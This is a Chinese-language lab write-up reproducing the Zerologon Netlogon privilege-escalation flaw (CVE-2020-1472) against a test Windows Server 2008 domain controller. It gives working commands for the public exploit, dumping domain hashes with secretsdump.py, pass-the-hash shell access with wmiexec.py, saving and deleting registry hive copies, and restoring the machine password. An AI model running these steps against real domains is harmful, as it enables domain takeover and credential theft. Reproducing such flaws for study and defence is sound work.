NetLogon权限提升漏洞(CVE-2020-1472)
**漏洞评分10分,**漏洞利用后果严重,未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞。成功利用此漏洞的攻击者可获得域管理员访问权限。
影响版本:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
搭建域控
环境:域控windows 2008 Server,成员windows 7(当然不是域内成员,只要能ping通域控即可)
参考大佬文章
https://www.cnblogs.com/forforever/p/13682344.html
漏洞利用
准备python3 (win7 sp1 最高只能装到3.7.5 再高需要升级)
安装 impacket 包
pip install impacket 导包 uninstall 卸载
使用方法(两种)
1、exp cve-2020-1472.py 放到script目录 一般是自动放到\python\Scripts\ (去python文件夹去找找)
2、直接安装好后不用将exp cve-2020-1472.py拷入,安装了impacket,直接使用包中的secretsdump.py即可。
ping一下域控看是否ping通 检查通路
注意:安装了impacket包之后,包中自带一个ping.py。所以利用系统的ping,需要指定ping.exe,否则ping 会识别成ping.py.
ping.exe X.x.x.x
利用:
python CVE-2020-1472.py AD-SERVER AD-SERVER$ xx.xx.x.x
pyt
hon CVE-2020-1472.py 域控nbios名 域控主机名$ 域控IP
域控名称: 右键我的电脑 -> 右下角更改设置 -> 更改 -> 勾选域,输入域名,上面添上域控名称 ->重启即可。
语法:
python secretsdump.py server08.com/AD-Server$@192.168.2.208 -just-dc -no-pass
python secretsdump.py server08.com/AD-Server$@192.168.2.208 -no-pass 导出所有hash
以上两条都可以。
python secretsdump.py 域名/域控名称$@域控IP -just-dc -no-pass #-just-dc只导出域控的NTDS.dit数据(NTLM hash和Kerberos hash)-no-pass 不询问密码
参考大佬复现结果
Server08$用户hash已被替换为31d6cfe0d16ae931b73c59d7e0c089c0 (空)。
横向转移
使用administrator的hash横向连接过去
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f Server08/administrator@192.168.2.208
python wmiexec.py -hashes LM:NT DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr
shell到手
获取计算机账号原始hash
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
简单理解为 存储 获取 删除(可能理解有偏差)
参考大佬结果
提取hash
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
将该原始计算机帐户哈希还原
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
python3 reinstall_original_pw.py WIN-2008-DC 192.168.3.123 6493fcc57bd126e9ab8fb9f56e8a79c9
查看WIN-2008-DC$账号的hash,已成功还原
secretsdump.py ggyao.com/administrator:1qaz@WSX@192.168.3.123 -just-dc-user 'WIN-2008-DC$'
可进可退乃真英雄
暂时还没有使用场景 可能后期还需更改。 仅作学习参考!!!
exp:
https://github.com/Kamimuka/CVE-2020-1472
https://github.com/risksense/zerologon
https://github.com/SecuraBV/CVE-2020-1472
参考链接:
https://www.cnblogs.com/forforever/p/13682344.html
域控搭建:
https://blog.csdn.net/wwl012345/article/details/88934571
https://jingyan.baidu.com/article/19192ad8e1593ae53e5707be.html
复现:
https://mp.weixin.qq.com/s/MSLbzg2hCoTSVTtEIxxpNQ
https://blog.csdn.net/mukami0621/article/details/108605941
https://blog.csdn.net/lhh134/article/details/108630955